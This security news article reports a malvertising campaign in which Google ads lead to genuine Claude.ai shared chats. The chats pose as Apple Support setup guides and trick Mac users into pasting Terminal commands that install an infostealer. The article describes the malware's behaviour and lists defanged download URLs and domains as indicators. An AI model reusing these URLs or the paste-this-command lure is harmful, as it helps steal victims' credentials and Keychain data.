Hackers Exploit Google Ads and Claude.ai Conversations to Distribute Mac Malware

Hackers are exploiting Google Ads and authentic Claude.ai shared conversations in a current malvertising operation.

People looking for “Claude mac download” might encounter paid search listings that display claude.ai as the destination site, yet redirect them to steps that install harmful software on their Mac.

Shared Claude Chats exploited to attack macOS users

The operation was discovered by Berk Albayrak, a security engineer at Trendyol Group, who posted his analysis on LinkedIn.

Albayrak found a Claude.ai shared conversation that masquerades as an official “Claude Code on Mac” setup guide, credited to “Apple Support.”

The conversation guides users through launching Terminal and copying a command, which quietly downloads and executes malware on their Mac.

While trying to confirm Albayrak’s findings, BleepingComputer encountered a second shared Claude conversation performing the same attack using completely different infrastructure.

Both conversations follow the same format and manipulation tactics but rely on separate domains and malicious files. Both were publicly available at the time of publication:

What does the macOS malware do?

The base64 commands shown in the shared Claude conversation retrieve an encoded shell script from domains such as:

• In variant spotted by Albayrak [VirusTotal]: hxxp://customroofingcontractors[.]com/curl/b42a0ed9d1ecb72e42d6034502c304845d98805481d99cea4e259359f9ab206e
• In variant spotted by BleepingComputer [VirusTotal]: hxxps://bernasibutuwqu2[.]com/debug/loader.sh?build=a39427f9d5bfda11277f1a58c89b7c2d

The ‘loader.sh’ (delivered by the second link above) contains another layer of Gunzip-compressed shell commands:

This compressed shell script operates entirely in memory, leaving minimal visible footprint on the hard drive.

BleepingComputer noticed the server delivering a uniquely obfuscated version of the payload with each request (a method called polymorphic delivery), making it more difficult for security products to detect the download using known hashes or signatures.

The variant found by BleepingComputer begins by verifying whether the system has Russian or CIS-region keyboard input sources set up. If detected, the script terminates without taking any action, quietly sending a cis_blocked status notification to the attacker’s server before exiting. Only systems that clear this check proceed to the next phase:

Before moving forward, the script also gathers the victim’s external IP address, hostname, OS version, and keyboard locale, transmitting everything back to the attacker. This type of victim profiling before delivering the payload indicates the operators are carefully choosing their targets.

The script then downloads a second-stage payload and executes it through osascript, macOS’s native scripting engine. This allows the attacker to run remote code without ever placing a traditional application or binary on the system.

The variant discovered by Albayrak, on the other hand, appears to skip the profiling steps entirely. It moves directly to execution.

It collects browser credentials, cookies, and macOS Keychain data, bundles them together, and sends them to the attacker’s server. Albayrak classified this as a variant of the MacSync macOS infostealer:

The briskinternet[.]com domain shown above in the variant identified by Albayrak appeared to be offline at the time of publication.

When the legitimate URL becomes the threat

Malvertising has turned into a frequent method for spreading malware.

BleepingComputer has previously covered similar operations targeting people searching for software like GIMP, where a convincing Google ad would display a legitimate-looking domain but redirect visitors to a counterfeit phishing page instead.

This campaign reverses that approach, as there is no fake domain to identify.

Both Google ads observed here direct users to Anthropic’s actual domain, claude.ai, since the attackers are embedding their malicious instructions within Claude’s own shared chat functionality. The URL in the ad is authentic.

However, this isn’t the first time attackers have misused AI platform shared chats in this manner. In December, BleepingComputer reported a similar operation targeting ChatGPT and Grok users.

Users should go directly to claude.ai to download the native Claude app, rather than clicking on sponsored search results. The legitimate Claude Code CLI can be obtained through Anthropic’s official documentation and does not involve pasting commands from a chat window.

It is wise to always treat any instructions asking you to paste terminal commands with skepticism, no matter where those instructions seem to originate.

BleepingComputer contacted Anthropic and Google for comment before publishing.